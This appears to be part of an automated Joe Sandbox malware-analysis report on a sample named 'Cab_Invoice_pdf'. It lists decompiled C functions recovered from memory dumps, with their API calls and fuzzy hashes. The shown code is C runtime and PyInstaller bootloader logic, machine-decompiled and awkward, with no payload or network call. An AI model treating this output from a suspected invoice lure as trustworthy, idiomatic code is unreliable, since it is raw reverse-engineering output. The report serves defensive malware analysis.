                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 5619dc2d115a0b4fba2053589bf067afb5d288396e2f1f6a5e46f15faa98a723
                            • Instruction ID: c38cdc15ecfb4a93aad769d38e4fda7e8979d4cc34cff848d020fe9e9ec58fd9
                            • Opcode Fuzzy Hash: 5619dc2d115a0b4fba2053589bf067afb5d288396e2f1f6a5e46f15faa98a723
                            • Instruction Fuzzy Hash: 9B31D472A0022AABDF25AF68DC40DAF7BE5EF50714F1441A8FC04D7194EB35D951CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131CDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
                            				signed int _v8;
                            				struct _SYSTEMTIME _v24;
                            				struct _SYSTEMTIME _v40;
                            				signed int _v44;
                            				signed int _t20;
                            				signed int _t26;
                            				signed int _t27;
                            				signed int _t43;
                            				signed int _t46;
                            
                            				_t20 =  *0x133c008; // 0xa3433343
                            				_v8 = _t20 ^ _t46;
                            				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
                            					if(FileTimeToSystemTime( &_a4,  &_v40) == 0 || SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24) == 0) {
                            						_t26 = E0131C998(GetLastError());
                            						goto L8;
                            					} else {
                            						_v44 = _v44 | 0xffffffff;
                            						_t27 = E0131CE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44);
                            						if((_t27 & _t43) == 0xffffffff) {
                            							_t26 = E0131C9CE();
                            							 *_t26 = 0x84;
                            							L8:
                            							_t27 = _t26 | 0xffffffff;
                            						}
                            					}
                            				} else {
                            					_t27 = _a12;
                            				}
                            				E0131786A();
                            				return _t27;
                            			}

                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 0131CDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0131CDF5
                            • GetLastError.KERNEL32 ref: 0131CE3D
                            • __dosmaperr.LIBCMT ref: 0131CE44
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction ID: e724454b2b17529ab85fe9cd1449cf305dec49364d4b75a11f38b9fb4f15c06e
                            • Opcode Fuzzy Hash: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction Fuzzy Hash: DE21607294010DABCB18DFE4C944AEEBBBCAF08325F106256E516D6084EB34D744CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E0131FD60(signed int __eax, void* __ecx, void* __edx) {
                            				signed int _t2;
                            				signed int _t3;
                            				int _t10;
                            				int _t11;
                            				void* _t13;
                            				void* _t16;
                            				short** _t17;
                            				char* _t20;
                            				void* _t21;
                            
                            				_t16 = __edx;
                            				_t13 = __ecx;
                            				_t17 =  *0x13460c0; // 0x1084680
                            				if(_t17 != 0) {
                            					_t10 = 0;
                            					while( *_t17 != _t10) {
                            						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
                            						_t11 = _t2;
                            						if(_t11 == 0) {
                            							L11:
                            							_t3 = _t2 | 0xffffffff;
                            						} else {
                            							_t20 = E01320B10(_t13, _t11, 1);
                            							_pop(_t13);
                            							if(_t20 == 0) {
                            								L10:
                            								_t2 = E013209EB(_t20);
                            								goto L11;
                            							} else {
                            								_t10 = 0;
                            								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
                            									goto L10;
                            								} else {
                            									_push(0);
                            									_push(_t20);
                            									E01326882(_t16);
                            									E013209EB(0);
                            									_t21 = _t21 + 0xc;
                            									_t17 =  &(_t17[1]);
                            									continue;
                            								}
                            							}
                            						}
                            						L9:
                            						return _t3;
                            						goto L12;
                            					}
                            					_t3 = 0;
                            					goto L9;
                            				} else {
                            					return __eax | 0xffffffff;
                            				}
                            				L12:
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd53034e76b2a648866ea272b7578883af12e3d605f57a1a7a613d311cc00bd6
                            • Instruction ID: 687964b47140dbb8d0ad98b8a684c8998c20f3c25440ae0a7b990c3e9fbdf379
                            • Opcode Fuzzy Hash: dd53034e76b2a648866ea272b7578883af12e3d605f57a1a7a613d311cc00bd6
                            • Instruction Fuzzy Hash: A8014FB220962A7EF629297C6CC1F7B665DDF517BCF600326F632551DDDA608D0841A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0131FDDF(signed int __eax, void* __ecx) {
                            				signed int _t2;
                            				signed int _t3;
                            				int _t10;
                            				int _t11;
                            				void* _t13;
                            				char** _t16;
                            				short* _t19;
                            				void* _t20;
                            
                            				_t13 = __ecx;
                            				_t16 =  *0x13460bc; // 0x0
                            				if(_t16 != 0) {
                            					_t10 = 0;
                            					while( *_t16 != _t10) {
                            						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                            						_t11 = _t2;
                            						if(_t11 == 0) {
                            							L11:
                            							_t3 = _t2 | 0xffffffff;
                            						} else {
                            							_t19 = E01320B10(_t13, _t11, 2);
                            							_pop(_t13);
                            							if(_t19 == 0) {
                            								L10:
                            								_t2 = E013209EB(_t19);
                            								goto L11;
                            							} else {
                            								_t10 = 0;
                            								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                            									goto L10;
                            								} else {
                            									_push(0);
                            									_push(_t19);
                            									E0132688D(_t13);
                            									E013209EB(0);
                            									_t20 = _t20 + 0xc;
                            									_t16 =  &(_t16[1]);
                            									continue;
                            								}
                            							}
                            						}
                            						L9:
                            						return _t3;
                            						goto L12;
                            					}
                            					_t3 = 0;
                            					goto L9;
                            				} else {
                            					return __eax | 0xffffffff;
                            				}
                            				L12:
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c5895b54a2633f70700ae944cd9cc038f738bc86bbd98df5584e3eb105e93e1
                            • Instruction ID: 6dea6ab17226b7dec6e8d329d7886201be7d06ebaf11757e0bf61ded4461cdcb
                            • Opcode Fuzzy Hash: 0c5895b54a2633f70700ae944cd9cc038f738bc86bbd98df5584e3eb105e93e1
                            • Instruction Fuzzy Hash: 4901D1B2209A2A7EF629297C6CC0D6B6A5DEF41BBCB200329F535921DADB608C084170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E01323623(signed int _a4) {
                            				signed int _t9;
                            				void* _t13;
                            				signed int _t15;
                            				WCHAR* _t22;
                            				signed int _t24;
                            				signed int* _t25;
                            				void* _t27;
                            
                            				_t9 = _a4;
                            				_t25 = 0x1346318 + _t9 * 4;
                            				_t24 =  *_t25;
                            				if(_t24 == 0) {
                            					_t22 =  *(0x13352d0 + _t9 * 4);
                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                            					if(_t27 != 0) {
                            						L8:
                            						 *_t25 = _t27;
                            						if( *_t25 != 0) {
                            							FreeLibrary(_t27);
                            						}
                            						_t13 = _t27;
                            						L11:
                            						return _t13;
                            					}
                            					_t15 = GetLastError();
                            					if(_t15 != 0x57) {
                            						_t27 = 0;
                            					} else {
                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                            						_t27 = _t15;
                            					}
                            					if(_t27 != 0) {
                            						goto L8;
                            					} else {
                            						 *_t25 = _t15 | 0xffffffff;
                            						_t13 = 0;
                            						goto L11;
                            					}
                            				}
                            				_t4 = _t24 + 1; // 0xa3433344
                            				asm("sbb eax, eax");
                            				return  ~_t4 & _t24;
                            			}

                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0131A8EB,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue), ref: 01323655
                            • GetLastError.KERNEL32(?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000,00000364,?,013244F7), ref: 01323661
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000), ref: 0132366F
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction ID: ef0cb0fa4b0668c1ccd00ca3549c129f1052f6e498986ee5c99aec6eca9fa040
                            • Opcode Fuzzy Hash: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction Fuzzy Hash: 3D01D432601236ABC731596CACC4A5ABB9CFB09B75F110620F919D3240D738D8048BE8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E013190D6() {
                            				void* _t4;
                            				void* _t8;
                            
                            				E013195F4();
                            				E01319588();
                            				if(E013192E8() != 0) {
                            					_t4 = E0131929A(_t8, __eflags);
                            					__eflags = _t4;
                            					if(_t4 != 0) {
                            						return 1;
                            					} else {
                            						E01319324();
                            						goto L1;
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 013190D6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 013190DB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 013190E0
                              • Part of subcall function 013192E8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 013192F9
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 013190F5
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction ID: f1ae8affaf00e4f12c2a455dbc1020fa86d0da459a9f17d5c8056f63a281f38a
                            • Opcode Fuzzy Hash: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction Fuzzy Hash: 8CC0486440032BD8DD2D3ABD22B53ED23880EBB98DBC0A8C1C8A02B44E8D07006B5333
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E01312450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
                            				char _v0;
                            				char _v4;
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t35;
                            				signed int _t39;
                            				signed int _t49;
                            				signed int _t52;
                            				signed int _t53;
                            				signed int _t60;
                            				signed int _t63;
                            				signed int _t64;
                            				signed int _t68;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t79;
                            				signed int _t85;
                            				signed int _t87;
                            				signed int _t91;
                            				signed int _t93;
                            				intOrPtr _t98;
                            				signed int _t101;
                            				intOrPtr* _t102;
                            				intOrPtr _t104;
                            				signed int _t108;
                            				void* _t110;
                            				void* _t112;
                            				void* _t114;
                            				signed int _t115;
                            				void* _t117;
                            				void* _t120;
                            
                            				_t120 = __eflags;
                            				_t90 = __edx;
                            				E01317880();
                            				_t35 =  *0x133c008; // 0xa3433343
                            				_a12288 = _t35 ^ _t108;
                            				_t104 = _a12300;
                            				E0131D2BE(E0131A7EB(2), 0);
                            				_push(0);
                            				_t39 = E01311770(_t120);
                            				_t93 = _t39;
                            				_t110 = _t108 + 0x10;
                            				if(_t93 != 0) {
                            					_t39 = E013127A0(__edx,  &_v0, _v0);
                            					_t110 = _t110 + 8;
                            					__eflags = _t39;
                            					if(_t39 == 0) {
                            						goto L1;
                            					} else {
                            						_t39 = E013126F0( &_a8192,  &_v0);
                            						_t110 = _t110 + 8;
                            						__eflags = _t39;
                            						if(__eflags == 0) {
                            							goto L1;
                            						} else {
                            							_t39 = L01312930(__eflags,  &_a4096,  &_v0);
                            							_t110 = _t110 + 8;
                            							__eflags = _t39;
                            							if(_t39 == 0) {
                            								goto L1;
                            							} else {
                            								_push(_t76);
                            								_push("_MEIPASS2");
                            								_t77 = E01313E40(_t76, _t93);
                            								E013143D0("_MEIPASS2");
                            								_t49 = E01311690(_t104, _t93,  &_v0);
                            								_t112 = _t110 + 0x10;
                            								__eflags = _t49;
                            								if(_t49 != 0) {
                            									L8:
                            									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
                            									_t98 = _a12296;
                            									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
                            									__eflags = _t77;
                            									if(_t77 != 0) {
                            										L11:
                            										__imp__SetDllDirectoryW(E01314BF0(0, _t77, 0));
                            										L01319803(_t50);
                            										_t114 = _t112 + 0x10;
                            										__eflags = _t77;
                            										if(_t77 == 0) {
                            											_t98 = _a12292;
                            											goto L25;
                            										} else {
                            											_t85 = _t77;
                            											_t63 =  &_a4092;
                            											while(1) {
                            												_t91 =  *_t63;
                            												__eflags = _t91 -  *_t85;
                            												if(_t91 !=  *_t85) {
                            													break;
                            												}
                            												__eflags = _t91;
                            												if(_t91 == 0) {
                            													L17:
                            													_t64 = 0;
                            												} else {
                            													_t91 =  *((intOrPtr*)(_t63 + 1));
                            													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
                            													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
                            														break;
                            													} else {
                            														_t63 = _t63 + 2;
                            														_t85 = _t85 + 2;
                            														__eflags = _t91;
                            														if(_t91 != 0) {
                            															continue;
                            														} else {
                            															goto L17;
                            														}
                            													}
                            												}
                            												L19:
                            												__eflags = _t64;
                            												if(__eflags == 0) {
                            													L23:
                            													_push(_t93);
                            													E01312140(_t91, __eflags);
                            													_t101 = E01312010(_t77, __eflags, _t93);
                            													L01312130(_t93);
                            													_t115 = _t114 + 0xc;
                            													goto L31;
                            												} else {
                            													_t21 = _t93 + 0x2068; // 0x2068
                            													_t102 = _t21;
                            													_t52 = E01311AC0(_t102, 0x1000, "%s", _t77);
                            													_t115 = _t114 + 0x10;
                            													__eflags = _t52 - 0x1000;
                            													if(_t52 >= 0x1000) {
                            														goto L27;
                            													} else {
                            														_t22 = _t93 + 0x3068; // 0x3068
                            														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
                            														_t87 = _t22 - _t102;
                            														__eflags = _t87;
                            														do {
                            															_t68 =  *_t102;
                            															_t102 = _t102 + 1;
                            															 *((char*)(_t87 + _t102 - 1)) = _t68;
                            															__eflags = _t68;
                            														} while (__eflags != 0);
                            														goto L23;
                            													}
                            												}
                            												goto L32;
                            											}
                            											asm("sbb eax, eax");
                            											_t64 = _t63 | 0x00000001;
                            											__eflags = _t64;
                            											goto L19;
                            										}
                            									} else {
                            										_t69 = E013121D0(_t93);
                            										_t114 = _t112 + 4;
                            										__eflags = _t69;
                            										if(_t69 != 0) {
                            											L25:
                            											_t52 = E01312070(_t90, _t104, _t93);
                            											_t115 = _t114 + 4;
                            											__eflags = _t52;
                            											if(_t52 != 0) {
                            												L27:
                            												_t53 = _t52 | 0xffffffff;
                            											} else {
                            												__eflags =  *((char*)(_t93 + 0x2068));
                            												_t29 = _t93 + 0x2068; // 0x2068
                            												_t79 = _t29;
                            												_t55 =  !=  ? _t79 :  &_a4092;
                            												E01314390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
                            												_push("_MEIPASS2");
                            												E01313E40(_t79, _t93);
                            												_push(_t93);
                            												_t52 = E013180A0();
                            												_t115 = _t115 + 0x10;
                            												__eflags = _t52 - 0xffffffff;
                            												if(__eflags != 0) {
                            													E013123D0(_t52);
                            													_push(_t104);
                            													_push(_t98);
                            													_push(_t93);
                            													_push( &_v4);
                            													_t60 = E01314400(_t90, _t104, __eflags);
                            													_t117 = _t115 + 0x10;
                            													_t101 = _t60;
                            													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
                            													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
                            														_push(_t79);
                            														E013140E0(_t90);
                            														_t117 = _t117 + 4;
                            													}
                            													E01311730(_t90, _t104, _t93);
                            													_t115 = _t117 + 4;
                            													L31:
                            													_t53 = _t101;
                            												} else {
                            													goto L27;
                            												}
                            											}
                            										} else {
                            											_t77 =  &_a4096;
                            											goto L11;
                            										}
                            									}
                            									L32:
                            									__eflags = _a12284 ^ _t115;
                            									E0131786A();
                            									return _t53;
                            								} else {
                            									_t71 = E01311690(_t104, _t93,  &_a8192);
                            									_t112 = _t112 + 8;
                            									__eflags = _t71;
                            									if(__eflags != 0) {
                            										goto L8;
                            									} else {
                            										_push( &_a8192);
                            										_t74 = E01311910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
                            										__eflags = _a12288 ^ _t112 + 0x0000000c;
                            										E0131786A();
                            										return _t74 | 0xffffffff;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					E0131786A();
                            					return _t39 | 0xffffffff;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: c6e44e7042ce63e9c32b94ec1c9103a8734f8e22118e63d0f5a06da82c153bb2
                            • Instruction ID: 93bdbb5c386e00a41ef0e1bbfab3993a0dbfec71828cc0138c1bc439c1b77d31
                            • Opcode Fuzzy Hash: c6e44e7042ce63e9c32b94ec1c9103a8734f8e22118e63d0f5a06da82c153bb2
                            • Instruction Fuzzy Hash: 5451B3B29043066BE72DE7399C41BFBB79CAF5036CF140929F94882249F725D618C273
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131D646(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                            				char* _v8;
                            				int _v12;
                            				char _v16;
                            				char _v24;
                            				char _v28;
                            				void* __ebx;
                            				char _t34;
                            				int _t35;
                            				int _t38;
                            				long _t39;
                            				char* _t42;
                            				int _t44;
                            				int _t47;
                            				int _t53;
                            				intOrPtr _t55;
                            				void* _t56;
                            				char* _t57;
                            				char* _t62;
                            				char* _t63;
                            				void* _t64;
                            				int _t65;
                            				short* _t67;
                            				short* _t68;
                            				int _t69;
                            				intOrPtr* _t70;
                            
                            				_t64 = __edx;
                            				_t53 = _a12;
                            				_t67 = _a4;
                            				_t68 = 0;
                            				if(_t67 == 0) {
                            					L3:
                            					if(_a8 != _t68) {
                            						E0131AFAE(_t53,  &_v28, _t64, _a16);
                            						_t34 = _v24;
                            						__eflags = _t67;
                            						if(_t67 == 0) {
                            							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                            							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                            								_t69 = _t68 | 0xffffffff;
                            								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                            								__eflags = _t35;
                            								if(_t35 != 0) {
                            									L29:
                            									_t28 = _t35 - 1; // -1
                            									_t69 = _t28;
                            									L30:
                            									__eflags = _v16;
                            									if(_v16 != 0) {
                            										_t55 = _v28;
                            										_t31 = _t55 + 0x350;
                            										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                            										__eflags =  *_t31;
                            									}
                            									return _t69;
                            								}
                            								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
                            								goto L30;
                            							}
                            							_t70 = _a8;
                            							_t56 = _t70 + 1;
                            							do {
                            								_t38 =  *_t70;
                            								_t70 = _t70 + 1;
                            								__eflags = _t38;
                            							} while (_t38 != 0);
                            							_t69 = _t70 - _t56;
                            							goto L30;
                            						}
                            						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                            						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                            							_t69 = _t68 | 0xffffffff;
                            							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                            							__eflags = _t35;
                            							if(_t35 != 0) {
                            								goto L29;
                            							}
                            							_t39 = GetLastError();
                            							__eflags = _t39 - 0x7a;
                            							if(_t39 != 0x7a) {
                            								L21:
                            								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
                            								 *_t67 = 0;
                            								goto L30;
                            							}
                            							_t42 = _a8;
                            							_t57 = _t42;
                            							_v8 = _t57;
                            							_t65 = _t53;
                            							__eflags = _t53;
                            							if(_t53 == 0) {
                            								L20:
                            								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                            								__eflags = _t44;
                            								if(_t44 != 0) {
                            									_t69 = _t44;
                            									goto L30;
                            								}
                            								goto L21;
                            							} else {
                            								goto L15;
                            							}
                            							while(1) {
                            								L15:
                            								_t45 =  *_t57;
                            								_v12 = _t65 - 1;
                            								__eflags =  *_t57;
                            								if(__eflags == 0) {
                            									break;
                            								}
                            								_t47 = E01325F84(__eflags, _t45 & 0x000000ff,  &_v24);
                            								_t62 = _v8;
                            								__eflags = _t47;
                            								if(_t47 == 0) {
                            									L18:
                            									_t65 = _v12;
                            									_t57 = _t62 + 1;
                            									_v8 = _t57;
                            									__eflags = _t65;
                            									if(_t65 != 0) {
                            										continue;
                            									}
                            									break;
                            								}
                            								_t62 = _t62 + 1;
                            								__eflags =  *_t62;
                            								if( *_t62 == 0) {
                            									goto L21;
                            								}
                            								goto L18;
                            							}
                            							_t42 = _a8;
                            							goto L20;
                            						}
                            						__eflags = _t53;
                            						if(_t53 == 0) {
                            							goto L30;
                            						}
                            						_t63 = _a8;
                            						while(1) {
                            							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                            							__eflags =  *(_t68 + _t63);
                            							if( *(_t68 + _t63) == 0) {
                            								goto L30;
                            							}
                            							_t68 =  &(_t68[0]);
                            							_t67 =  &(_t67[1]);
                            							__eflags = _t68 - _t53;
                            							if(_t68 < _t53) {
                            								continue;
                            							}
                            							goto L30;
                            						}
                            						goto L30;
                            					}
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					return E01321788() | 0xffffffff;
                            				}
                            				if(_t53 != 0) {
                            					 *_t67 = 0;
                            					goto L3;
                            				}
                            				return 0;
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?), ref: 0131D6DC
                            • GetLastError.KERNEL32 ref: 0131D6EA
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 0131D745
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction ID: 444b596832ea90282e26e2333ef3e722be24a61a2ae4c9c4c85aea112fd5360e
                            • Opcode Fuzzy Hash: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction Fuzzy Hash: E541F931600286AFDB2A9FECC84CBAEBBB9EF43328F144169F95957199D7318901C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:6.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:67

                            Graph

